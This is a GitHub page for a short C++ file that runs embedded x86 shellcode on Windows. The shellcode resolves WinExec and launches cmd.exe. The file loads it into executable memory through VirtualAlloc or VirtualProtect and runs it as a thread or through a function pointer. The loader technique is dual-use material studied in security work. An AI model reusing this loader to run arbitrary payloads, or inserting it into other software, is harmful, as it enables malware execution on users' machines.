-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshellcode_exec.cpp
49 lines (31 loc) · 1.84 KB
/
shellcode_exec.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include<iostream>
#include<windows.h>
#include<cstdlib>
using namespace std;
//execute shellcode in windows
char shellcode[]="\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x52\x5e\x31\xff\x53\x5f\x31\xc9\x51\x68\x78\x65\x63\x00\x68\x57\x69\x6e\x45\x89\xe1\x51\x53\xff\xd2\x31\xc9\x51\x68\x65\x73\x73\x00\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\xe1\x51\x57\x31\xff\x89\xc7\xff\xd6\x31\xf6\x50\x5e\x31\xc9\x51\x68\x65\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x00\x51\xff\xd7\x6a\x00\xff\xd6\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00";
//CMD EXE SHELLCODE
DWORD WINAPI dynamic_thread(){
LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode), 0x3000, 0x40); //allocate memory for shellcode
RtlMoveMemory(addressPointer,shellcode,sizeof(shellcode)); //store shellcode in allocated space
HANDLE th=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)addressPointer,NULL,0,0); //execute shellcode as thread
WaitForSingleObject(th,INFINITE); //wait till shellcode finishes execution
CloseHandle(th);
return 0;
}
DWORD WINAPI func_ptr()
{
DWORD Prev;
if(VirtualProtect(shellcode,strlen(shellcode),PAGE_EXECUTE_READWRITE,&Prev))
//enables execution in region where shellcode is stored
printf("worked");
printf("Prev was %d",Prev);
//previous page flags read/write/execute
int (*func)()=(int(*)())shellcode; //function pointer part like linux
func();
return 0;
}
int main()
{
func_ptr();
}